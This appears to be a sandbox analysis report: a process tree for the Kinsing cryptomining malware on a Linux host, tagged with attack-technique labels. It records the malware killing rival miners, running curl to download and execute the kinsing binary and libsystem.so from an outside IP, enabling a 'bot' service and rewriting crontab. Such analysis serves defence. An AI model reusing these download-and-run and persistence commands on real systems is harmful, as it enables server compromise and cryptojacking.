/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1440
-
-
/usr/bin/idid -u2⤵PID:1441
-
-
/usr/bin/sudosudo mkdir /etc/data2⤵
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
PID:1442 -
/usr/sbin/sendmailsendmail -t3⤵PID:1445
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tmGBy-0000NJ-FP4⤵
- Reads CPU attributes
PID:1459
-
-
-
/usr/sbin/sendmailsendmail -t3⤵PID:1448
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tmGBy-0000NM-G14⤵
- Reads CPU attributes
PID:1458
-
-
-
/bin/mkdirmkdir /etc/data3⤵PID:1449
-
-
-
/usr/bin/idid -u2⤵PID:1450
-
-
/bin/unameuname -i2⤵
- Attempts to change immutable files
PID:1451
-
-
/bin/unameuname -m2⤵PID:1452
-
-
/bin/lsls -la /etc/data2⤵PID:1454
-
-
/bin/grepgrep -e /dev2⤵PID:1455
-
-
/bin/grepgrep -v grep2⤵PID:1456
-
-
/usr/bin/pkillpkill -f sshd2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1457
-
-
/usr/bin/pkillpkill -f htop2⤵
- Reads CPU attributes
PID:1460
-
-
/usr/bin/pkillpkill -f linuxsys2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1462
-
-
/usr/bin/pkillpkill -f kthreaddo2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1463
-
-
/usr/bin/pkillpkill -f donkey2⤵
- Reads CPU attributes
PID:1464
-
-
/usr/bin/pkillpkill -f sysupdater2⤵
- Reads CPU attributes
PID:1465
-
-
/usr/bin/pkillpkill -f php-update.service2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1468
-
-
/usr/bin/pkillpkill -f update-setup2⤵
- Reads CPU attributes
PID:1469
-
-
/bin/grepgrep :14142⤵PID:1471
-
-
/bin/grepgrep -v -2⤵PID:1474
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1475
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1472
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1473
-
-
/bin/grepgrep rtw88_pcied2⤵PID:1477
-
-
/bin/grepgrep -v grep2⤵PID:1478
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1480
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1479
-
-
/bin/psps ax2⤵
- Reads CPU attributes
PID:1476
-
-
/bin/grepgrep stratum2⤵PID:1482
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1481
-
-
/bin/grepgrep -v grep2⤵PID:1483
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1484
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1485
-
-
/bin/grepgrep Sofia2⤵PID:1487
-
-
/bin/grepgrep -v grep2⤵PID:1488
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1486
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1489
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1490
-
-
/usr/bin/pkillpkill -f Sofia2⤵
- Reads CPU attributes
PID:1491
-
-
/bin/grepgrep tracepath2⤵PID:1493
-
-
/bin/grepgrep -v grep2⤵PID:1494
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1492
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1495
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1496
-
-
/bin/grepgrep -v grep2⤵PID:1499
-
-
/bin/grepgrep /dot2⤵PID:1498
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1500
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1501
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1497
-
-
/bin/grepgrep -v grep2⤵PID:1504
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1505
-
-
/bin/grepgrep "php-fpm pool www"2⤵PID:1503
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1506
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1502
-
-
/bin/grepgrep -v grep2⤵PID:1509
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1510
-
-
/bin/grepgrep "Cli start accept"2⤵PID:1508
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1511
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1507
-
-
/bin/grepgrep -v grep2⤵PID:1514
-
-
/bin/grepgrep "bash -k"2⤵PID:1513
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1515
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1512
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1516
-
-
/bin/grepgrep -v grep2⤵PID:1519
-
-
/bin/grepgrep perfctl2⤵PID:1518
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1520
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1521
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1517
-
-
/usr/bin/pkillpkill -f hezb2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1522
-
-
/usr/bin/pkillpkill -f /tmp/.out2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1523
-
-
/bin/grepgrep -v grep2⤵PID:1526
-
-
/bin/grepgrep ./ll12⤵PID:1525
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1527
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1528
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1524
-
-
/usr/bin/awkawk "{if(\$3>80.0) print \$2}"2⤵PID:1532
-
-
/bin/grepgrep -v grep2⤵PID:1531
-
-
/bin/grepgrep agetty2⤵PID:1530
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1533
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1529
-
-
/usr/bin/pkillpkill -f 42.112.28.2162⤵
- Reads CPU attributes
PID:1534
-
-
/bin/grepgrep 207.38.87.62⤵PID:1536
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1537
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1538
-
-
/bin/grepgrep -v -2⤵PID:1539
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1540
-
-
/bin/grepgrep 23.94.214.1192⤵PID:1542
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1543
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1544
-
-
/bin/grepgrep -v -2⤵PID:1545
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1546
-
-
/bin/grepgrep 127.0.0.1:520182⤵PID:1548
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1549
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1550
-
-
/bin/grepgrep -v -2⤵PID:1551
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1552
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1555
-
-
/bin/grepgrep 34.81.218.76:94862⤵PID:1554
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1556
-
-
/bin/grepgrep -v -2⤵PID:1557
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1558
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1561
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1562
-
-
/bin/grepgrep 42.112.28.216:94862⤵PID:1560
-
-
/bin/grepgrep -v -2⤵PID:1563
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1564
-
-
/usr/bin/pkillpkill -f .git/kthreaddw2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1565
-
-
/usr/bin/pkillpkill -f 80.211.206.1052⤵
- Reads CPU attributes
- Reads runtime system information
PID:1566
-
-
/usr/bin/pkillpkill -f 207.38.87.62⤵
- Reads CPU attributes
PID:1567
-
-
/usr/bin/pkillpkill -f p84442⤵
- Reads CPU attributes
- Reads runtime system information
PID:1568
-
-
/usr/bin/pkillpkill -f supportxmr2⤵
- Reads CPU attributes
PID:1569
-
-
/usr/bin/pkillpkill -f monero2⤵
- Reads CPU attributes
PID:1570
-
-
/usr/bin/pkillpkill -f kthreaddi2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1571
-
-
/usr/bin/pkillpkill -f srv002⤵
- Reads CPU attributes
- Reads runtime system information
PID:1572
-
-
/usr/bin/pkillpkill -f /tmp/.javae/javae2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1573
-
-
/usr/bin/pkillpkill -f .javae2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1574
-
-
/usr/bin/pkillpkill -f .syna2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1575
-
-
/usr/bin/pkillpkill -f xmm2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1576
-
-
/usr/bin/pkillpkill -f solr.sh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1577
-
-
/usr/bin/pkillpkill -f /tmp/.solr/solrd2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1578
-
-
/usr/bin/pkillpkill -f /tmp/javac2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1579
-
-
/usr/bin/pkillpkill -f /tmp/.go.sh2⤵
- Reads CPU attributes
PID:1580
-
-
/usr/bin/pkillpkill -f /tmp/.x/agetty2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1581
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker2⤵
- Reads CPU attributes
PID:1582
-
-
/usr/bin/pkillpkill -f c3pool2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1583
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/gitag-ssh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1584
-
-
/usr/bin/pkillpkill -f /tmp/12⤵
- Reads CPU attributes
- Reads runtime system information
PID:1585
-
-
/usr/bin/pkillpkill -f /tmp/okk.sh2⤵
- Reads CPU attributes
PID:1586
-
-
/usr/bin/pkillpkill -f /tmp/gitaly2⤵
- Reads CPU attributes
PID:1587
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1588
-
-
/usr/bin/pkillpkill -f 43a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFB2⤵
- Reads CPU attributes
PID:1589
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/supervise2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1590
-
-
/usr/bin/pkillpkill -f /tmp/.ssh/redis.sh2⤵
- Reads CPU attributes
PID:1591
-
-
/bin/grepgrep ./udp2⤵PID:1593
-
-
/bin/grepgrep -v grep2⤵PID:1594
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1592
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1595
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1596
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/012⤵
- Attempts to change immutable files
PID:1597
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1599
-
-
/bin/catcat /tmp/.X11-unix/012⤵PID:1598
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/112⤵
- Attempts to change immutable files
PID:1600
-
-
/bin/catcat /tmp/.X11-unix/112⤵PID:1601
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1602
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/222⤵
- Attempts to change immutable files
PID:1603
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1605
-
-
/bin/catcat /tmp/.X11-unix/222⤵PID:1604
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.12⤵
- Attempts to change immutable files
PID:1606
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1608
-
-
/bin/catcat /tmp/.systemd.12⤵PID:1607
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.22⤵
- Attempts to change immutable files
PID:1609
-
-
/bin/catcat /tmp/.systemd.22⤵PID:1610
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1611
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.32⤵
- Attempts to change immutable files
PID:1612
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1614
-
-
/bin/catcat /tmp/.systemd.32⤵PID:1613
-
-
/bin/catcat /tmp/.systemd.12⤵PID:1615
-
-
/bin/catcat /tmp/.systemd.22⤵PID:1616
-
-
/bin/catcat /tmp/.systemd.32⤵PID:1617
-
-
/bin/sedsed -i "s/^0//" /tmp/.pg_stat.02⤵
- Attempts to change immutable files
PID:1618
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1620
-
-
/bin/catcat /tmp/.pg_stat.02⤵PID:1619
-
-
/bin/sedsed -i "s/^0//" /tmp/.pg_stat.12⤵
- Attempts to change immutable files
PID:1621
-
-
/bin/catcat /tmp/.pg_stat.12⤵PID:1622
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1623
-
-
/bin/sedsed -i "s/^0//" /data/./oka.pid2⤵
- Attempts to change immutable files
PID:1624
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1626
-
-
/bin/catcat /data/./oka.pid2⤵PID:1625
-
-
/bin/sedsed -i "s/^0//" /tmp/.ICE-unix/d2⤵
- Attempts to change immutable files
PID:1627
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1629
-
-
/bin/catcat /tmp/.ICE-unix/d2⤵PID:1628
-
-
/bin/sedsed -i "s/^0//" /tmp/.ICE-unix/m2⤵
- Attempts to change immutable files
PID:1630
-
-
/bin/catcat /tmp/.ICE-unix/m2⤵PID:1631
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1632
-
-
/usr/bin/pkillpkill -f zsvc2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1633
-
-
/usr/bin/pkillpkill -f pdefenderd2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1634
-
-
/usr/bin/pkillpkill -f updatecheckerd2⤵
- Reads CPU attributes
PID:1635
-
-
/usr/bin/pkillpkill -f cruner2⤵
- Reads CPU attributes
PID:1636
-
-
/usr/bin/pkillpkill -f dbused2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1637
-
-
/usr/bin/pkillpkill -f bashirc2⤵
- Reads CPU attributes
PID:1638
-
-
/usr/bin/pkillpkill -f meminitsrv2⤵
- Reads CPU attributes
PID:1639
-
-
/bin/grepgrep ./oka2⤵PID:1641
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:1640
-
-
/bin/grepgrep -v grep2⤵PID:1642
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1643
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1644
-
-
/bin/grepgrep "postgres: autovacum"2⤵PID:1646
-
-
/bin/grepgrep -v grep2⤵PID:1647
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1645
-
-
/usr/bin/awkawk "{print \$2}"2⤵
- Reads runtime system information
PID:1648
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1649
-
-
/bin/grepgrep -v bin2⤵PID:1652
-
-
/usr/bin/awkawk "length(\$1) == 8"2⤵PID:1651
-
-
/bin/grepgrep -v "\\["2⤵PID:1653
-
-
/bin/grepgrep -v "("2⤵PID:1654
-
-
/bin/grepgrep -v php-fpm2⤵PID:1655
-
-
/bin/psps ax -o "command,pid" -www2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1650
-
-
/bin/grepgrep -v proxymap2⤵PID:1656
-
-
/bin/grepgrep -v postgres2⤵PID:1657
-
-
/bin/grepgrep -v postgrey2⤵PID:1658
-
-
/bin/grepgrep -v kinsing2⤵PID:1659
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1660
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1661
-
-
/usr/bin/awkawk "length(\$1) == 16"2⤵PID:1663
-
-
/bin/grepgrep -v bin2⤵PID:1664
-
-
/bin/psps ax -o "command,pid" -www2⤵
- Reads runtime system information
PID:1662
-
-
/bin/grepgrep -v "\\["2⤵PID:1665
-
-
/bin/grepgrep -v "("2⤵PID:1666
-
-
/bin/grepgrep -v php-fpm2⤵PID:1667
-
-
/bin/grepgrep -v proxymap2⤵PID:1668
-
-
/bin/grepgrep -v postgres2⤵PID:1669
-
-
/bin/grepgrep -v postgrey2⤵PID:1670
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1671
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1672
-
-
/usr/bin/awkawk "length(\$5) == 8"2⤵PID:1674
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1673
-
-
/bin/grepgrep -v "\\["2⤵PID:1676
-
-
/bin/grepgrep -v bin2⤵PID:1675
-
-
/bin/grepgrep -v "("2⤵PID:1677
-
-
/bin/grepgrep -v php-fpm2⤵PID:1678
-
-
/bin/grepgrep -v proxymap2⤵PID:1679
-
-
/bin/grepgrep -v postgres2⤵PID:1680
-
-
/bin/grepgrep -v postgrey2⤵PID:1681
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1682
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1683
-
-
/bin/grepgrep -v grep2⤵PID:1685
-
-
/bin/grepgrep /tmp/sscks2⤵PID:1686
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1687
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1688
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1684
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1692
-
-
/usr/bin/md5summd5sum /etc/data/kinsing2⤵PID:1691
-
-
/bin/rmrm -rf /etc/data/kinsing2⤵PID:1693
-
-
/bin/chmodchmod 777 /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1694
-
-
/usr/bin/curlcurl -o /etc/data/kinsing http://194.38.22.120/kinsing2⤵PID:1695
-
-
/bin/chmodchmod +x /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1696
-
-
/usr/bin/md5summd5sum /etc/data/kinsing2⤵PID:1699
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1700
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1703
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1704
-
-
/bin/chmodchmod 777 /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1705
-
-
/usr/bin/curlcurl -o /etc/data/libsystem.so http://194.38.22.120/libsystem.so2⤵PID:1706
-
-
/bin/chmodchmod +x /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1707
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1710
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1711
-
-
/bin/chmodchmod 777 /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1712
-
-
/usr/bin/curlcurl -o /etc/data/libsystem.so http://194.38.22.120/libsystem.so2⤵PID:1713
-
-
/bin/chmodchmod +x /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1714
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1717
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1718
-
-
/bin/rmrm -rf /tmp/kdevtmpfsi2⤵PID:1719
-
-
/bin/chmodchmod 777 /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1720
-
-
/bin/chmodchmod +x /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1721
-
-
/etc/data/kinsing/etc/data/kinsing2⤵PID:1722
-
-
/usr/bin/idid -u2⤵PID:1724
-
-
/bin/systemctlsystemctl enable bot2⤵
- Enumerates kernel/hardware configuration
PID:1725
-
-
/bin/systemctlsystemctl start bot2⤵
- Enumerates kernel/hardware configuration
PID:1738
-
-
/bin/sedsed /base64/d2⤵PID:1743
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1744
-
-
/usr/bin/crontabcrontab -l2⤵PID:1742
-
-
/bin/sedsed /_cron/d2⤵PID:1746
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1747
-
-
/usr/bin/crontabcrontab -l2⤵PID:1745
-
-
/bin/sedsed /31.210.20.181/d2⤵PID:1749
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1750
-
-
/usr/bin/crontabcrontab -l2⤵PID:1748
-
-
/bin/sedsed /update.sh/d2⤵PID:1752
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1753
-
-
/usr/bin/crontabcrontab -l2⤵PID:1751
-
-
/bin/sedsed /logo4/d2⤵PID:1755
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1756
-
-
/usr/bin/crontabcrontab -l2⤵PID:1754
-
-
/bin/sedsed /logo9/d2⤵PID:1758
-
-
/usr/bin/crontabcrontab -l2⤵PID:1757
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1759
-
-
/bin/sedsed /logo0/d2⤵PID:1761
-
-
/usr/bin/crontabcrontab -l2⤵PID:1760
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1762
-
-
/bin/sedsed /logo/d2⤵PID:1764
-
-
/usr/bin/crontabcrontab -l2⤵PID:1763
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1765
-
-
/bin/sedsed /tor2web/d2⤵PID:1767
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1768
-
-
/usr/bin/crontabcrontab -l2⤵PID:1766
-
-
/bin/sedsed /jpg/d2⤵PID:1770
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1771
-
-
/usr/bin/crontabcrontab -l2⤵PID:1769
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1774
-
-
/bin/sedsed /png/d2⤵PID:1773
-
-
/usr/bin/crontabcrontab -l2⤵PID:1772
-
-
/bin/sedsed /tmp/d2⤵PID:1776
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1777
-
-
/usr/bin/crontabcrontab -l2⤵PID:1775
-
-
/bin/sedsed /zmreplchkr/d2⤵PID:1779
-
-
/usr/bin/crontabcrontab -l2⤵PID:1778
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1780
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1783
-
-
/bin/sedsed /aliyun.one/d2⤵PID:1782
-
-
/usr/bin/crontabcrontab -l2⤵PID:1781
-
-
/bin/sedsed /3.215.110.66.one/d2⤵PID:1785
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1786
-
-
/usr/bin/crontabcrontab -l2⤵PID:1784
-
-
/bin/sedsed /pastebin/d2⤵PID:1788
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1789
-
-
/usr/bin/crontabcrontab -l2⤵PID:1787
-
-
/bin/sedsed /onion/d2⤵PID:1791
-
-
/usr/bin/crontabcrontab -l2⤵PID:1790
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1792
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1795
-
-
/bin/sedsed /lsd.systemten.org/d2⤵PID:1794
-
-
/usr/bin/crontabcrontab -l2⤵PID:1793
-
-
/bin/sedsed /shuf/d2⤵PID:1797
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1798
-
-
/usr/bin/crontabcrontab -l2⤵PID:1796
-
-
/bin/sedsed /ash/d2⤵PID:1803
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1804
-
-
/usr/bin/crontabcrontab -l2⤵PID:1802
-
-
/bin/sedsed /mr.sh/d2⤵PID:1806
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1807
-
-
/usr/bin/crontabcrontab -l2⤵PID:1805
-
-
/bin/sedsed /185.181.10.234/d2⤵PID:1809
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1810
-
-
/usr/bin/crontabcrontab -l2⤵PID:1808
-
-
/bin/sedsed /localhost.xyz/d2⤵PID:1812
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1813
-
-
/usr/bin/crontabcrontab -l2⤵PID:1811
-
-
/bin/sedsed /45.137.151.106/d2⤵PID:1815
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1816
-
-
/usr/bin/crontabcrontab -l2⤵PID:1814
-
-
/usr/bin/crontabcrontab -l2⤵PID:1817
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1819
-
-
/bin/sedsed /111.90.159.106/d2⤵PID:1818
-
-
/bin/sedsed /github/d2⤵PID:1821
-
-
/usr/bin/crontabcrontab -l2⤵PID:1820
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1822
-
-
/bin/sedsed /bigd1ck.com/d2⤵PID:1824
-
-
/usr/bin/crontabcrontab -l2⤵PID:1823
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1825
-
-
/bin/sedsed /xmr.ipzse.com/d2⤵
- System Network Configuration Discovery
PID:1827
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1828
-
-
/usr/bin/crontabcrontab -l2⤵PID:1826
-
-
/bin/sedsed /185.181.10.234/d2⤵PID:1830
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1831
-
-
/usr/bin/crontabcrontab -l2⤵PID:1829
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1834
-
-
/bin/sedsed /91.241.19.134/d2⤵PID:1833
-
-
/usr/bin/crontabcrontab -l2⤵PID:1832
-
-
/bin/sedsed /122.51.164.83/d2⤵PID:1836
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1837
-
-
/usr/bin/crontabcrontab -l2⤵PID:1835
-
-
/bin/sedsed /185.191.32.198/d2⤵PID:1839
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1840
-
-
/usr/bin/crontabcrontab -l2⤵PID:1838
-
-
/bin/sedsed /newdat.sh/d2⤵PID:1842
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1843
-
-
/usr/bin/crontabcrontab -l2⤵PID:1841
-
-
/bin/sedsed /lib.pygensim.com/d2⤵PID:1845
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1846
-
-
/usr/bin/crontabcrontab -l2⤵PID:1844
-
-
/bin/sedsed /t.amynx.com/d2⤵PID:1848
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1849
-
-
/usr/bin/crontabcrontab -l2⤵PID:1847
-
-
/bin/sedsed /update.sh/d2⤵PID:1851
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1852
-
-
